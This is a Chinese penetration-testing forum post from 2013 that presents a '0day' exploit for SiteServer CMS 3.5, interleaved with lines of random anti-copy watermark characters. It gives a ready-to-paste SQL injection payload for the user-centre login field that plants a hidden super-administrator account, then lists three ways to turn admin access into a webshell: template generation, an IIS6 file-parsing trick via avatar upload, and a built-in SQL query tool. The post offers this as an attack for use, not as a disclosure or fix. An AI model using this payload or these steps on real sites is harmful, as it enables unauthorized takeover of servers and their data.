中国网络渗透测试联盟
标题:
SiteServer CMS 0Day
[打印本页]
作者:
admin
时间:
2013-1-11 21:10
标题:
SiteServer CMS 0Day
经测试秒杀最新的3.5版
+ l% l' m! @9 ~ Y; l4 s2 m
1 a: Y6 E, x0 }7 ? @0 e. K6 x1 t3 k
stieserver官网:
www.siteserver.cn
8 v/ F( J0 \) \7 ^3 S
* n6 r$ y% A0 C# G
2 U4 @( `8 w: ?1 _# h+ H
1 J. m/ ~' r/ |
EXP:
3 M8 R8 h w1 w( R% ^' S* O# i v
4 F+ b: k. x8 c0 o
直接访问UserCenter/login.aspx
5 G) S; ^' B- i, U# L6 t& R6 X
/ k0 x8 P3 X& Q) s$ j* ^) I( b
( o0 e4 z5 h+ I3 T' _8 w) }
$ f& O2 M0 D9 o! o# k
用户名处输入:
( j+ i+ Z# E. l5 W7 `
. o8 D0 z) V: H
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
# z- i# Y& F2 S0 J7 E, Q
5 E: k' i( H P R. D5 `' Z; o
: q. E! p( a6 m4 W5 r# [
1 w+ |0 t2 J9 n
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
L* g; W0 [# r7 a; x
% k" r+ `8 ~% ~8 D0 \ m
& F" p; g/ S# N% K2 V
' K8 P8 z N8 l5 K: t
之后再访问后台SiteServer/login.aspx用插入的用户登陆
; x. ~8 y: @8 s4 Y
0 T0 W2 `5 _' f4 z8 ?
/ i' T$ m4 q4 M; y9 f
9 k# R: L% a* o& ?% J' w) c" ?
后台拿webshell的三种方法:
' l5 ^, P; V% r. V
1 T) z1 |% v" W: a M
一、
; B# M2 i( A# m+ ?5 y2 \
9 k+ d7 Z1 I6 f
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
3 i4 f/ a( p# T( B( N9 d
; n: b& \! w- M4 E f) I
二、
+ q8 h2 L# |+ |
9 o: G5 w8 H0 W; G: h. L' R
成员权限-》添加用户-》用户名为:1.asp
4 u; m# \# h( {+ |
8 R4 J6 g/ R/ N1 D
http://127.0.0.1/usercenter/
/ J8 _6 I) k+ p" f2 B9 W
/ |: j& C" F' P
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
V( g3 u3 Y8 ^0 Z3 K
1 g) `& A5 O! P2 d' I4 m
(ps:后台添加用户时不会验证是否含有非法字符)
& @" j) J' ^) E: j/ v4 L# Y
' p+ v5 `- {8 E8 s
三、
9 C- A5 a R: o" G5 {" r$ [
% l# o" h6 r2 p: X
系统工具-》实用工具-》机器参数查看
" K9 `$ j+ B7 r2 Z
可以看到数据库类型、名称,WEB路径
; C+ i" B ~: c6 R5 [ z4 A
* z' r$ A" j+ Q3 h
系统工具-》数据库工具-》SQL语句查询
. ?% ^' F$ m( H6 Y' i1 v# D
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
# {' O5 n3 S8 V7 O. F% ?
|6 K% j O; i) G
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2